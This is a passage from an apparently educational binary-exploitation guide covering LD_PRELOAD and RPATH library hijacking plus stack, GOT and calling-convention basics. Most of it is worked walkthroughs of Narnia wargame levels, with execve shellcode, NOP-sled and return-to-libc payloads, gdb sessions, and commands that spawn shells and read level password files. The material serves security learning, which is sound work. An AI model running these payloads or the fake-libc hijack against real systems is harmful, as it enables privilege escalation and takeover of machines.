   return 1;
}

Now, we need to compile this with

gcc hacking_randomfile.c -o hacking_randomfile -shared -fPIC

Using gcc we’ve specified the normal input file (hacking_randomfile.c) and output file (-o hacking_randomfile), but we’ve also specified two additional options:

-shared to make a library and
-fPIC to specify Position Independent Code, which is necessary for making a shared library.

Now that we’ve built hacking_randomfile as a shared library, here’s the basic usage:

$ LD_PRELOAD="$PWD/hacking_randomtime" ./main_targetfile

SANS has written a blog about Go To The Head Of The Class: LD_PRELOAD For The Win

Important things to note
  • Function definition should be correct

  • Funtion input and return type should also be correct.

Controlling uninitialized memory with LD_PRELOAD

Dan Rosenberg has documented this technique at Controlling uninitialized memory with LD_PRELOAD The below stuff is directly taken from the blog post.

A local Linux user can exercise a degree of control over uninitialized memory on the stack when executing a program. This happens because of the way the Linux linker/loader, ld.so, handles the LD_PRELOAD environment variable. This variable allows users to specify libraries to be preloaded, effectively allowing users to override functions used in a particular binary. However, regardless of whether or not libraries specified via LD_PRELOAD are actually loaded at runtime, ld.so copies the name of each library onto the stack prior to executing the program, and doesn’t clean up after itself. By specifying a very long LD_PRELOAD variable and executing a binary, a portion of the stack will be overwritten with part of the LD_PRELOAD variable during linking, and it will stay that way once execution of the program begins, even on setuid binaries, where the library itself is not loaded.

This means we can initialise the memory to something under out control:

$ export LD_PRELOAD=`python -c 'print "/bin/getflag\x0a"*1000'`

i.e. fill the stack with one thousand /bin/getflags.

Then when we run flagXX with length of 1, it will almost certainly have this in the buffer already:

$ echo -ne "Content-Length: 1\n " | /home/flagXX/flagXX
sh: !getflag: command not found
getflag is executing on a non-flag account, this doesn't count
getflag is executing on a non-flag account, this doesn't count
getflag is executing on a non-flag account, this doesn't count
... lots of repeats ...
sh: line 74: /bin/getfl=qm: No such file or directory

Of course, the LD_PRELOAD variable is ignored with setuid binaries, since otherwise an attacker could trivially override arbitrary functions in setuid binaries and easily take control of a system.

LIBC - Rpath

If there’s exist a suid binary with a RPATH defined which we control, we can get code execution. Let’s first read what’s rpath?

RPATH

rpath designates the run-time search path hard-coded in an executable file or library. Dynamic linking loaders use the rpath to find required libraries. Specifically it encodes a path to shared libraries into the header of an executable (or another shared library). This RPATH header value (so named in the Executable and Linkable Format header standards) may either override or supplement the system default dynamic linking search paths.

Libraries loaded from the run-time path defined by RPATH wont disable the setuid execution as LDPRELOAD would do. So we can inject our own libc.so.6 (Using version GLIBC2.0 as required by the binary) in the RPATH directory and hook any of the used functions to execute our setuid shell.

We can use readelf to check the dynamic section of a binary

readelf -d flagXX

Dynamic section at offset 0xf20 contains 21 entries:
 Tag        Type                         Name/Value
0x00000001 (NEEDED)                     Shared library: [libc.so.6]
0x0000000f (RPATH)                      Library rpath: [/var/tmp/flagXX]
0x0000000c (INIT)                       0x80482c0

In the above example, we can see that RPATH is defined as /var/tmp/flagXX, so the binary tries to load the libc.so.6 from that location.

Let’s see what are the functions the binary utilizes from libc

objdump -R flagXX

flagXX:     file format elf32-i386

DYNAMIC RELOCATION RECORDS
OFFSET   TYPE              VALUE
08049ff0 R_386_GLOB_DAT    __gmon_start__
0804a000 R_386_JUMP_SLOT   puts
0804a004 R_386_JUMP_SLOT   __gmon_start__
0804a008 R_386_JUMP_SLOT   __libc_start_main

If RPATH is writeable, we can possibly get a shell by creating a fake libc.so and defining fake __libc_start_main function with

system("/bin/sh");

to get a shell. We may also refer Linux x86 Program Start Up or - How the heck do we get to main()? to understand what happens when we execute a linux binary (shared not static).

libc_start_main

From linuxbase The _libcstart_main() function shall perform any necessary initialization of the execution environment, call the main function with appropriate arguments, and handle the return from main(). If the main() function returns, the return value shall be passed to the exit() function.

int __libc_start_main(int (*main) (int, char * *, char * *), int argc, char * * ubp_av, void (*init) (void), void (*fini) (void), void (*rtld_fini) (void), void (* stack_end));
gmon_start

The function call_gmon_start initializes the gmon profiling system. This system is enabled when binaries are compiled with the -pg flag, and creates output for use with gprof(1). In the case of the scenario binary call_gmon_start is situated directly proceeding that _start function. The call_gmon_start function finds the last entry in the Global Offset Table (also known as __gmon_start__) and, if not NULL, will pass control to the specified address. The __gmon_start__ element points to the gmon initialization function, which starts the recording of profiling information and registers a cleanup function with atexit(). In our case however gmon is not in use, and as such __gmon_start__ is NULL.

Version Reference

GLib provides version information, primarily useful in configure checks for builds that have a configure script.

Check glib version in binary

objdump -p flagXX

flagXX:     file format elf32-i386

Version References:
 required from libc.so.6:
   0x0d696910 0x00 02 GLIBC_2.0

or

objdump -T flagXX

flagXX:     file format elf32-i386

DYNAMIC SYMBOL TABLE:
00000000      DF *UND* 00000000  GLIBC_2.0   puts
00000000  w   D  *UND* 00000000              __gmon_start__
00000000      DF *UND* 00000000  GLIBC_2.0   __libc_start_main
080484cc g    DO .rodata       00000004  Base        _IO_stdin_used

Check glib version in your linux machine

ldd --version
ldd (Debian GLIBC 2.26-2) 2.26

If you get error like “no version information available”, create a file version.ld with the version required.

cat version.ld
GLIBC_2.0 {
};

and link it while compiling

gcc -shared -static-libgcc -fPIC -Wl,--version-script=version.ld,-Bstatic shell.c -o libc.so.6
LD_DEBUG environment variable

If the LD_DEBUG variable is set then the Linux dynamic linker will dump debug information which can be used to resolve most loading problems very quickly. To see the available options just run any program with the variable set to help, i.e.:

LD_DEBUG=help cat
Valid options for the LD_DEBUG environment variable are:

 libs        display library search paths
 reloc       display relocation processing
 files       display progress for input file
 symbols     display symbol table processing
 bindings    display information about symbol binding
 versions    display version dependencies
 all         all previous options combined
 statistics  display relocation statistics
 unused      determined unused DSOs
 help        display this help message and exit

If you want to debug a binary

LD_DEBUG all ./flagXX

D_DEBUG=all ./flagXX
     4796:
     4796:     file=libc.so.6 [0];  needed by ./flagXX [0]
     4796:     find library=libc.so.6 [0]; searching
     4796:      search path=/var/tmp/flagXX/tls/i686/sse2/cmov:/var/tmp/flagXX/tls/i686/sse2:/var/tmp/flagXX/tls/i686/cmov:/var/tmp/flagXX/tls/i686:/var/tmp/flagXX/tls/sse2/cmov:/var/tmp/flagXX/tls/sse2:/var/tmp/flagXX/tls/cmov:/var/tmp/flagXX/tls:/var/tmp/flagXX/i686/sse2/cmov:/var/tmp/flagXX/i686/sse2:/var/tmp/flagXX/i686/cmov:/var/tmp/flagXX/i686:/var/tmp/flagXX/sse2/cmov:/var/tmp/flagXX/sse2:/var/tmp/flagXX/cmov:/var/tmp/flagXX            (RPATH from file ./flagXX)
     4796:       trying file=/var/tmp/flagXX/tls/i686/sse2/cmov/libc.so.6

ulimit

ulimit User limits - limit the use of system-wide resources.

Syntax
     ulimit [-acdfHlmnpsStuv] [limit]

Options

  -S   Change and report the soft limit associated with a resource.
  -H   Change and report the hard limit associated with a resource.

  -a   All current limits are reported.
  -c   The maximum size of core files created.
  -d   The maximum size of a process's data segment.
  -f   The maximum size of files created by the shell(default option)
  -l   The maximum size that can be locked into memory.
  -m   The maximum resident set size.
  -n   The maximum number of open file descriptors.
  -p   The pipe buffer size.
  -s   The maximum stack size.
  -t   The maximum amount of cpu time in seconds.
  -u   The maximum number of processes available to a single user.
  -v   The maximum amount of virtual memory available to the process.

ulimit provides control over the resources available to the shell and to processes started by it, on systems that allow such control.

The soft limit is the value that the kernel enforces for the corresponding resource. The hard limit acts as a ceiling for the soft limit.

Appendix-III Basic Concepts

The below has been completely taken from Binary Exploitation CTF101

Binaries, or executables, are machine code for a computer to execute. For the most part, the binaries that you will face in CTFs are Linux ELF files or the occasional windows executable. Binary Exploitation is a broad topic within Cyber Security which really comes down to finding a vulnerability in the program and exploiting it to gain control of a shell or modifying the program’s functions.

Registers

A register is a location within the processor that is able to store data, much like RAM.

Registers can hold any value: addresses (pointers), results from mathematical operations, characters, etc. Some registers are reserved however, meaning they have a special purpose and are not “general purpose registers” (GPRs).

On x86, the only 2 reserved registers are

  • rip which hold the address of the next instruction to execute and

  • rsp which hold the address of the stack respectively.

On x86, the same register can have different sized accesses for backwards compatability. For example,

  • the rax register is the full 64-bit register,

  • eax is the low 32 bits of rax,

  • ax is the low 16 bits,

  • al is the low 8 bits, and ah is the high 8 bits of ax (bits 8-16 of rax).

Stack

In computer architecture, the stack is a hardware manifestation of the stack data structure (a Last In, First Out queue).

  • The esp/rsp register holds the address in memory where the bottom of the stack resides.

  • When something is pushed to the stack, esp decrements by 4 (or 8 on 64-bit x86), and the value that was pushed is stored at that location in memory.

  • Likewise, when a pop instruction is executed, the value at esp is retrieved (i.e. esp is dereferenced), and esp is then incremented by 4 (or 8).

..Note :: The stack “grows” down to lower memory addresses!

  • Conventionally, ebp/rbp contains the address of the top of the current stack frame, and so sometimes local variables are referenced as an offset relative to ebp rather than an offset to esp.

  • A stack frame is essentially just the space used on the stack by a given function.

Uses

The stack is primarily used for a few things:

  • Storing function arguments

  • Storing local variables

  • Storing processor state between function calls

Example

Let’s compile a simple program and check for stack

#include <stdio.h>
void say_hi(const char * name) {
   printf("Hello %s!\n", name);
}

int main(int argc, char ** argv) {
   char * name;
   if (argc != 2) {
       return 1;
   }
   name = argv[1];
   say_hi(name);
   return 0;
}
gcc -g hello.c -o hello

Put breakpoints at the call of say_hi function

  • Check whats the esp and ebp value.

  • When a call instruction is executed; call instructions first push the current instruction pointer to the stack, then jump to their destination.

  • The first thing say_hi does is save the current ebp so that when it returns, ebp is back where main expects it to be.

Calling Conventions

To be able to call functions, there needs to be an agreed-upon way to pass arguments.

In Linux binaries, there are really only two commonly used calling conventions: cdecl for 32-bit binaries, and SysV for 64-bit

cdecl

In 32-bit binaries on Linux, function arguments are passed in on the stack in reverse order. A function like this:

int add(int a, int b, int c) {
   return a + b + c;
   }

would be invoked by pushing c, then b, then a.

SysV

For 64-bit binaries, function arguments are first passed in certain registers:

RDI
RSI
RDX
RCX
R8
R9

then any leftover arguments are pushed onto the stack in reverse order, as in cdecl.

Global Offset Table

The Global Offset Table (or GOT) is a section inside of programs that holds addresses of functions that are dynamically linked. common functions (like those in libc) are “linked” into the program so they can be saved once on disk and reused by every program.

Unless a program is marked full RELRO, the resolution of function to address in dynamic library is done lazily. All dynamic libraries are loaded into memory along with the main program at launch, however functions are not mapped to their actual code until they’re first called. For example, in the following C snippet puts won’t be resolved to an address in libc until after it has been called once:

int main() {
   puts("Hi there!");
   puts("Ok bye now.");
   return 0;
}

To avoid searching through shared libraries each time a function is called, the result of the lookup is saved into the GOT so future function calls “short circuit” straight to their implementation bypassing the dynamic resolver.

This has two important implications:

  • The GOT contains pointers to libraries which move around due to ASLR

  • The GOT is writable

PLT

Before a functions address has been resolved, the GOT points to an entry in the Procedure Linkage Table (PLT). This is a small “stub” function which is responsible for calling the dynamic linker with (effectively) the name of the function that should be resolved.

Buffer

A buffer is any allocated space in memory where data (often user input) can be stored.

In the following C program name would be considered a stack buffer:

#include <stdio.h>

int main() {
char name[64] = {0};
read(0, name, 63);
printf("Hello %s", name);
return 0;
}

Buffers could also be global variables:

#include <stdio.h>
char name[64] = {0};
int main() { code_snippet }

Or dynamically allocated on the heap like

char *name = malloc(64);
memset(name, 0, 64);

Buffer Overflow Examples

  • Let’s see a simple example of binary exploitation Narnia0 where we have to write a written value.

#include <stdio.h>
#include <stdlib.h>

int main(){
    long val=0x41414141;
    char buf[20];

    printf("Correct val's value from 0x41414141 -> 0xdeadbeef!\n");
    printf("Here is your chance: ");
    scanf("%24s",&buf);

    printf("buf: %s\n",buf);
    printf("val: 0x%08x\n",val);

    if(val==0xdeadbeef)
        system("/bin/sh");
    else {
        printf("WAY OFF!!!!\n");
        exit(1);
    }

    return 0;
}

In this example, value of variable val can be overwritten by overflowing buf. Another small observation is scanf function scans 24 characters. If you directly write 20 “A” and the address it won’t work as the val doesn’t matches. So, we have to use python print command. If we use

python -c 'print "A"*20 + "\xef\xbe\xad\xde"' | ./narnia0

you will see that the value would match but the shell is exited. To keep the shell active, we need to use cat as shown below:

(python -c 'print "A"*20 + "\xef\xbe\xad\xde"';cat) | ./narnia0
  • In another example below Narnia1

#include <stdio.h>

int main(){
    int (*ret)();

    if(getenv("EGG")==NULL){
        printf("Give me something to execute at the env-variable EGG\n");
        exit(1);
    }

    printf("Trying to execute EGG!\n");
    ret = getenv("EGG");
    ret();

    return 0;
}

We need to set a environment variable EGG with an shellcode. Previously, I tried with

export EGG="\bin\sh"
and
export EGG="\x6a\x0b\x58\x99\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x31\xc9\xcd\x80"

Shellcode were taken from the Shellstorm website. However, both failed with Segmentation fault. superkojiman, barrebas helped me with and told that if I write

export EGG=`python -c 'print "\xCC"'`

It should sigtrap. “xCC” acts as a software breakpoint, basically an INT3, It tells you whether your shellcode is stored properly & executed, if the program receives SIGTRAP, you know you’re good to go, and it’s a good way to make sure you’ve properly redirected execution to your shellcode. You can further put “xCC” anywhere in the shellcode, if it crashes before “xCC”, you know for sure that your shellcode has bad characters. They suggested to export the EGG variable as

export EGG=`python -c 'print "\x6a\x0b\x58\x99\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x31\xc9\xcd\x80"'`

and it worked like a charm.

  • In another example Narnia2

#include <stdio.h>
#include <string.h>
#include <stdlib.h>

int main(int argc, char * argv[]){
    char buf[128];

    if(argc == 1){
        printf("Usage: %s argument\n", argv[0]);
        exit(1);
    }
    strcpy(buf,argv[1]);
    printf("%s", buf);

    return 0;
}

It’s to easy that buffer overflow vulnerability exists because of strcpy. Let’s see what is the offset for this.

ulimit -c unlimited
./narnia2 `/usr/share/metasploit-framework/tools/pattern_create.rb 200`
Segmentation fault (core dumped)

gdb -q -c core ./narnia2
#0  0x37654136 in ?? ()

/usr/share/metasploit-framework/tools/pattern_offset.rb 0x37654136
[*] Exact match at offset 140
narnia2@melinda:~$ gdb -q /narnia/narnia2
(gdb) disassemble main
Dump of assembler code for function main:
**Snip**
   0x080484a0 <+67>:    mov    %eax,(%esp)
   0x080484a3 <+70>:    call   0x8048320 <strcpy@plt>
**Snip**
End of assembler dump.
(gdb) br *main+70
Breakpoint 1 at 0x80484a3
(gdb) run `python -c 'print "A"*140 + "BBBB"'`
Starting program: /games/narnia/narnia2 `python -c 'print "A"*140 + "BBBB"'`

Breakpoint 1, 0x080484a3 in main ()
(gdb) n
0x42424242 in ?? ()

Let’s see the stack after the strcpy, which would tell us the probable address we want to redirect execution.

(gdb) x/80xw $esp+400
0xffffd7e0: 0x0000000f  0xffffd80b  0x00000000  0x00000000
0xffffd7f0: 0x00000000  0x00000000  0x1d000000  0xa9c79d1b
0xffffd800: 0xe1a67367  0xc19fc850  0x6996cde4  0x00363836
0xffffd810: 0x2f000000  0x656d6167  0x616e2f73  0x61696e72
0xffffd820: 0x72616e2f  0x3261696e  0x41414100  0x41414141
0xffffd830: 0x41414141  0x41414141  0x41414141  0x41414141
0xffffd840: 0x41414141  0x41414141  0x41414141  0x41414141
0xffffd850: 0x41414141  0x41414141  0x41414141  0x41414141
0xffffd860: 0x41414141  0x41414141  0x41414141  0x41414141
0xffffd870: 0x41414141  0x41414141  0x41414141  0x41414141
0xffffd880: 0x41414141  0x41414141  0x41414141  0x41414141
0xffffd890: 0x41414141  0x41414141  0x41414141  0x41414141
0xffffd8a0: 0x41414141  0x41414141  0x41414141  0x41414141
0xffffd8b0: 0x41414141  0x42424241  0x44580042  0x45535f47
0xffffd8c0: 0x4f495353  0x44495f4e  0x3939383d  0x53003733

Let pick a shellcode from shellstorm for a Linux x86 execuve /bin/sh and calculate the number of NOPs

narnia2@melinda:~$ python -c 'print len("\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80")'
23
narnia2@melinda:~$ bc
140-23
117
narnia2@melinda:~$ /narnia/narnia2 `python -c 'print "\x90"*117 + "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80" + "\x50\xd8\xff\xff"'`
$ cat /etc/narnia_pass/narnia3
**********
$
  • In another example Narnia3

#include <stdio.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <fcntl.h>
#include <unistd.h>
#include <stdlib.h>
#include <string.h>

int main(int argc, char **argv){

        int  ifd,  ofd;
        char ofile[16] = "/dev/null";
        char ifile[32];
        char buf[32];

        if(argc != 2){
                printf("usage, %s file, will send contents of file 2 /dev/null\n",argv[0]);
                exit(-1);
        }

        /* open files */
        strcpy(ifile, argv[1]);
        if((ofd = open(ofile,O_RDWR)) < 0 ){
                printf("error opening %s\n", ofile);
                exit(-1);
        }
        if((ifd = open(ifile, O_RDONLY)) < 0 ){
                printf("error opening %s\n", ifile);
                exit(-1);
        }

        /* copy from file1 to file2 */
        read(ifd, buf, sizeof(buf)-1);
        write(ofd,buf, sizeof(buf)-1);
        printf("copied contents of %s to a safer place... (%s)\n",ifile,ofile);

        /* close 'em */
        close(ifd);
        close(ofd);

        exit(1);
}

Superkojiman notes explain this best, copied here with permission, thanks superkojiman :)

narnia3@melissa:/narnia$ ./narnia3 /etc/motd
copied contents of /etc/motd to a safer place... (/dev/null)

We can use this program to read the contents of /etc/narnia_pass/narnia4, but the output is written to /dev/null. We control the input file and the output file is set as /dev/null. However, because of the way the stack is laid out, we can write past the ifile buffer and overwrite the value of ofile. This lets us replace /dev/null with another file of our choosing. Here’s what the stack looks like:

+---------+
|  ret    |
|  sfp    |
|  ofd    |
|  ifd    |
|  ofile  |
|  ifile  |
|  buf    |
+---------+ <- esp

ifile and ofile are 32-byte arrays. We can compile the program with -ggdb and examine it in gdb

# gcc -ggdb -m32 -fno-stack-protector -Wl,-z,norelro narnia3.c -o narnia3
# gdb -q narnia3

If we disas main, we can see that strcpy is called at *main+100:

0x08048551 <+93>:    lea    0x38(%esp),%eax
0x08048555 <+97>:    mov    %eax,(%esp)
0x08048558 <+100>:   call   0x8048400 <strcpy@plt>
0x0804855d <+105>:   movl   $0x2,0x4(%esp)
0x08048565 <+113>:   lea    0x58(%esp),%eax
0x08048569 <+117>:   mov    %eax,(%esp)

We set a breakpoint there and run the program with the following arguments:

(gdb) r `python -c 'print "A"*32 + "/tmp/hack"'`
Starting program: /root/wargames/narnia/3/narnia3 `python -c 'print "A"*32 + "/tmp/hack"'`

Breakpoint 1, 0x08048558 in main (argc=2, argv=0xbffff954) at narnia3.c:37
37          strcpy(ifile, argv[1]);

At the first breakpoint, we examine the local variables

(gdb) i locals
ifd = 134514299
ofd = -1208180748
ofile = "/dev/null\000\000\000\000\000\000"
ifile = "x\370\377\277\234\203\004\b\200\020\377\267\214\230\004\b\250\370\377\277\211\206\004\b$\243\374\267\364\237", <incomplete sequence \374\267>
buf = "\370\370\377\267\364\237\374\267\371\234\367\267\245B\352\267h\370\377\277չ\350\267\364\237\374\267\214\230\004\b"

ofile is set to /dev/null as expected. We’ll step to the next instruction and check again.

 (gdb) s
 38          if((ofd = open(ofile,O_RDWR)) < 0 ){
 (gdb) i locals
 ifd = 134514299
 ofd = -1208180748
 ofile = "/tmp/hack\000\000\000\000\000\000"
 ifile = 'A' <repeats 32 times>
 buf = "\370\370\377\267\364\237\374\267\371\234\367\267\245B\352\267h\370\377\277չ\350\267\364\237\374\267\214\230\004\b"

As expected, ofile has been overwritten to /tmp/hack. However ifile is now AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/tmp/hack so in order to read /etc/narnia_pass/narnia4, we need to create a directory AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/tmp and symlink /etc/narnia_pass/narnia4 to AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/tmp/hack
narnia3@melissa:/tmp/skojiman3$ mkdir -p AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/tmp
narnia3@melissa:/tmp/skojiman3$ ln -s /etc/narnia_pass/narnia4 AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/tmp/hack

Next we need to create the output file /tmp/hack that ofile points to

narnia3@melissa:/tmp/skojiman3$ touch /tmp/hack
narnia3@melissa:/tmp/skojiman3$ chmod 666 /tmp/hack
narnia3@melissa:/tmp/skojiman3$ ls -l /tmp/hack
-rw-rw-rw- 1 narnia3 narnia3 0 2012-11-24 22:58 /tmp/hack

Finally, execute /narnia/narnia3 as follows:

narnia3@melissa:/tmp/skojiman3$ /narnia/narnia3 `python -c 'print "A"*32 + "/tmp/hack"'`
copied contents of AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/tmp/hack to a safer place... (/tmp/hack)
narnia3@melissa:/tmp/skojiman3$ cat /tmp/hack
thaenohtai
��*������e���@�narnia3@melissa:/tmp/skojiman3$
  • Let’s see another example Narnia6.

#include <stdio.h>
#include <stdlib.h>
#include <string.h>

extern char **environ;

// tired of fixing values...
// - morla
unsigned long get_sp(void) {
       __asm__("movl %esp,%eax\n\t"
               "and $0xff000000, %eax"
               );
}

int main(int argc, char *argv[]){
    char b1[8], b2[8];
    int  (*fp)(char *)=(int(*)(char *))&puts, i;

    if(argc!=3){ printf("%s b1 b2\n", argv[0]); exit(-1); }

    /* clear environ */
    for(i=0; environ[i] != NULL; i++)
        memset(environ[i], '\0', strlen(environ[i]));
    /* clear argz    */
    for(i=3; argv[i] != NULL; i++)
        memset(argv[i], '\0', strlen(argv[i]));

    strcpy(b1,argv[1]);
    strcpy(b2,argv[2]);
    //if(((unsigned long)fp & 0xff000000) == 0xff000000)
    if(((unsigned long)fp & 0xff000000) == get_sp())
        exit(-1);
    fp(b1);

    exit(1);
}

Stack is not executable for this binary. This binary is an example of “return-to-libc” attack is a computer security attack usually starting with a buffer overflow in which a subroutine return address on a call stack is replaced by an address of a subroutine that is already present in the process’ executable memory, rendering the NX bit feature useless (if present) and ridding the attacker of the need to inject their own code.

gdb -q narnia6
Reading symbols from /home/bitvijays/narnia6...(no debugging symbols found)...done.
gdb-peda$ checksec
CANARY    : disabled
FORTIFY   : disabled
NX        : ENABLED
PIE       : disabled
RELRO     : disabled
gdb-peda$

Let’s compile the source on the local and check what happens:

gcc -m32 -ggdb -fno-stack-protector -Wall narnia6.c -o narnia61

If you see carefully, we passed A8 + BBBB + “ “ + “C”8 + DDDD, which resulted in

gdb -q ./narnia61
gdb-peda$ pdisass main
Dump of assembler code for function main:
   0x080486d2 <+330>:   call   0x8048450 <exit@plt>
   0x080486d7 <+335>:   lea    eax,[esp+0x20]
   0x080486db <+339>:   mov    DWORD PTR [esp],eax
   0x080486de <+342>:   mov    eax,DWORD PTR [esp+0x28]
   0x080486e2 <+346>:   call   eax
   0x080486e4 <+348>:   mov    DWORD PTR [esp],0x1
   0x080486eb <+355>:   call   0x8048450 <exit@plt>
End of assembler dump.
gdb-peda$ br *main+346
Breakpoint 1 at 0x80486e2: file narnia6.c, line 48.
gdb-peda$ run `python -c 'print "A"*8 + "BBBB" + " " + "C"*8 + "DDDD"'`
[-------------------------------------code-------------------------------------]
   0x80486d7 <main+335>:    lea    eax,[esp+0x20]
   0x80486db <main+339>:    mov    DWORD PTR [esp],eax
   0x80486de <main+342>:    mov    eax,DWORD PTR [esp+0x28]
=> 0x80486e2 <main+346>:    call   eax
   0x80486e4 <main+348>:    mov    DWORD PTR [esp],0x1
   0x80486eb <main+355>:    call   0x8048450 <exit@plt>
   0x80486f0 <__libc_csu_fini>: push   ebp
   0x80486f1 <__libc_csu_fini+1>:   mov    ebp,esp
Guessed arguments:
arg[0]: 0xffffd380 ("DDDD")
Breakpoint 1, 0x080486e2 in main (argc=0x3, argv=0xffffd444) at narnia6.c:48
48      fp(b1);
gdb-peda$ p b1
$1 = "DDDD\000AAA"
gdb-peda$ p b2
$2 = "CCCCCCCC"
gdb-peda$ p puts
$3 = {<text variable, no debug info>} 0xf7eb3360 <puts>
gdb-peda$ p system
$4 = {<text variable, no debug info>} 0xf7e8bc30 <system>
gdb-peda$ p &b1
$5 = (char (*)[8]) 0xffffd380
gdb-peda$ x/50xw 0xffffd350
0xffffd360: 0xffffd380  0xffffd5df  0x0000003b  0x0804874b
0xffffd370: 0x00000003  0xffffd444  0x43434343  0x43434343
0xffffd380: 0x44444444  0x41414100  0x42424242  0x00000000
0xffffd390: 0x08048700  0xf7fb0ff4  0xffffd418  0xf7e66e46
0xffffd3a0: 0x00000003  0xffffd444  0xffffd454  0xf7fde860
gdb-peda$ p fp
$6 = (int (*)(char *)) 0x42424242
gdb-peda$ p &fp
$7 = (int (**)(char *)) 0xffffd388
gdb-peda$ p $fp
$8 = (void *) 0xffffd398

The address of fp “p &fp” is 0xffffd3888 which has a value of (“p fp”) 0x42424242. As previously the stack is NoteXecutable, but stdlib.h is included in the C Program. Stdlib.h includes system call which has an address of (“p system”) 0xf7e8bc30. Further DDDD overwrites AAAA with the Null byte.

narnia6@melinda:/narnia$ ./narnia6 `python -c 'print "A"*8 + "\x40\x1c\xe6\xf7" + " " + "C"*8 + "/bin/sh"'`
$ cat /etc/narnia_pass/narnia7
  • Let’s see another example where we have to use a environment variable to invoke a shell Narnia8.

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
// gcc's variable reordering fucked things up
// to keep the level in its old style i am
// making "i" global unti i find a fix
// -morla
int i;

void func(char *b){
    char *blah=b;
    char bok[20];
    //int i=0;

    memset(bok, '\0', sizeof(bok));
    for(i=0; blah[i] != '\0'; i++)
        bok[i]=blah[i];

    printf("%s\n",bok);
}

int main(int argc, char **argv){

    if(argc > 1)
        func(argv[1]);
    else
    printf("%s argument\n", argv[0]);

    return 0;
}

Let’s see what is happening here: for loop in function func copies data from blah to bok character array until a null character is found. Let’s see how the stack would look like

<bok character array><blah pointer><fp><ret><pointer b>

Let’s confirm this by using gdb? We put an breakpoint on printf function in the func function.

0xffffd670: 0x08048580  0xffffd688  0x00000014  0xf7e54f53
0xffffd680: 0x00000000  0x00ca0000  0x41414141  0x41414141
0xffffd690: 0x41414141  0x41414141  0x00414141  0xffffd8b1
0xffffd6a0: 0x00000002  0xffffd764  0xffffd6c8  0x080484cd
0xffffd6b0: 0xffffd8b1  0xf7ffd000  0x080484fb  0xf7fca000

Address 0xffffd689 marks the start of the character buffer bok. I entered 19 A so it’s 0x41 19 times followed by null 0x00. Followed by that is 0xffffd8b1 (Value of Blah pointer). Followed by fp 12 bytes <0x00000002 0xffffd764 0xffffd6c8>. Followed by 0x080484cd which is the return address

(gdb) x/s 0x080484cd
0x80484cd <main+31>:    "\353\025\213E\f\213"

followed by pointer b (0xffffd8b1). Let’s see what’s at location 0xffffd8b1

(gdb) x/20wx 0xffffd8b1
0xffffd8b1: 0x41414141  0x41414141  0x41414141  0x41414141
0xffffd8c1: 0x00414141  0x5f474458  0x53534553  0x5f4e4f49

Let’s see what happens when we try to enter more than the 19 character (buffer size of bok - 1 byte (for null character))

narnia8@melinda:/narnia$ ./narnia8 `python -c 'print "A"*20'`
AAAAAAAAAAAAAAAAAAAA����
narnia8@melinda:/narnia$ ./narnia8 `python -c 'print "A"*20'` | hexdump
0000000 4141 4141 4141 4141 4141 4141 4141 4141
0000010 4141 4141 d8bf ffff 0a02
000001a

As expected, we get A followed by some garbage. which is the address where blah is pointing. We know that we can overwrite the RET address by

# `python -c 'print "A"*20 + "\x90\x90\x90\x90" + "A"*12 + "BBBB"'`

Let’s see what happens when we do this. After copying 20 A it copies x90 and makes blah pointer from 0xffffd8bf to 0xffffd890. Because of the for loop

for(i=0; blah[i] != '\0'; i++)

It now copies the character from 0xffffd890 reference i.e 0xffffd890 + i value. Suppose it copied the character 0x41. The address becomes 0xffff4190 and now for loop searches from that address until a null character is found.

(gdb) x/20xw $esp
0xffffd660: 0xffffd678  0x00000000  0x00000014  0xf7e54f53
0xffffd670: 0x00000000  0x00ca0000  0x41414141  0x41414141
0xffffd680: 0x41414141  0x41414141  0x41414141  0xffffd890
0xffffd690: 0x00000002  0xffffd754  0xffffd6b8  0x080484cd
0xffffd6a0: 0xffffd89c  0xf7ffd000  0x080484fb  0xf7fca000

(gdb) x/10xw 0xffffd890
0xffffd890: 0x2f61696e  0x6e72616e  0x00386169  0x41414141
0xffffd8a0: 0x41414141  0x41414141  0x41414141  0x41414141
0xffffd8b0: 0x90909090  0x41414141

(gdb) x/20xw $esp
0xffffd660: 0x08048580  0xffffd678  0x00000014  0xf7e54f53
0xffffd670: 0x00000000  0x00ca0000  0x41414141  0x41414141
0xffffd680: 0x41414141  0x41414141  0x41414141  0xffff4190
0xffffd690: 0x00000002  0xffffd754  0xffffd6b8  0x080484cd
0xffffd6a0: 0xffffd89c  0xf7ffd000  0x080484fb  0xf7fca000

(gdb) x/10xw 0xffff4190
0xffff4190: 0x00000000  0x00000000  0x00000000  0x00000000
0xffff41a0: 0x00000000  0x00000000  0x00000000  0x00000000
0xffff41b0: 0x00000000  0x00000000

If we can somehow keep/change the blah pointer back to it’s original value we may overwrite the RET pointer (after 12 bytes). Let’s see how 0xffffd89c looks when is used

`python -c 'print "A"*20 + "\x90\x90\x90\x90" + "A"*12 + "BBBB"'`
(gdb) x/30xw 0xffffd89c
0xffffd89c: 0x41414141  0x41414141  0x41414141  0x41414141
0xffffd8ac: 0x41414141  0x90909090  0x41414141  0x41414141
0xffffd8bc: 0x41414141  0x42424242  0x47445800  0x5345535f

When we used the below with the address, we were able to overwrite the RET by BBBB. Now, we control the EIP :)

(gdb) run `python -c 'print "A"*20 + "\x9c\xd8\xff\xff" + "A"*12 + "BBBB"'`


(gdb) x/20xw $esp
0xffffd660: 0x08048580  0xffffd678  0x00000014  0xf7e54f53
0xffffd670: 0x00000000  0x00ca0000  0x41414141  0x41414141
0xffffd680: 0x41414141  0x41414141  0x41414141  0xffffd89c
0xffffd690: 0x41414141  0x41414141  0x41414141  0x42424242

Let’s export a shellcode using a environment variable check it’s address on the stack and redirect the flow of our code to it. Notice the number of NOPs we have put for easy identification plus reachability.

